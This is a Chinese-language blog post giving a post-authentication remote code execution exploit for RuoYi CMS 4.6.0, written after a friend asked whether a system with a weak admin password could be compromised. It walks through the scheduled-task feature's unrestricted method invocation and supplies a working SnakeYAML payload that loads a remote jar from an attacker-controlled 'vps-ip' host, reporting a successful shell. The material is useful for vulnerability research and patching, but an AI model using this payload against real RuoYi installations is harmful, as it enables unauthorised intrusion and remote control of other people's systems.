若依CMS4.6.0后台RCE

0x00 前言

此漏洞源于一个朋友遇到了这个系统,后台有弱口令,问能不能shell

开始审计,先看官方文档,发现作者在文档中写明了历史漏洞,告诫了用户使用风险,还算是良心了

https://doc.ruoyi.vip/ruoyi/document/kslj.html#%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E

 

 

重点是shell,且目标为当时最新版本,历史漏洞已经无法用了,由于有后台权限,搭建了系统在后台浏览了一下功能,发现存在一个任务调度的功能

 

 

根据添加调度任务的url定位到代码,最终定位到任务执行代码:

 

 

 可以看到代码无任何黑白名单限制,直接动态调用任意类任意方法

摸一下依赖有snakeyaml

 

 

便想着用artsploit攻击spring-cloud 的那一套思路(https://github.com/artsploit/yaml-payload

 

0x01 漏洞利用

位置:系统监控->定时任务->添加任务

任务名称 :随便填
调用目标字符串:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps-ip:port/yaml-payload.jar"]]]]') 
cron表达式: 0/50 * * * * ? (随便填)
执行策略: 执行一次
状态:正常
 
成功getshell

利用思路有很多,抛砖引玉了。

 

0x02 总结

漏洞未在最新4.6.1版本上试过,代码如果没改的话,理论上都是可以的。

posted @ 2021-04-23 13:54  水泡泡  阅读(10154)  评论(0编辑  收藏  举报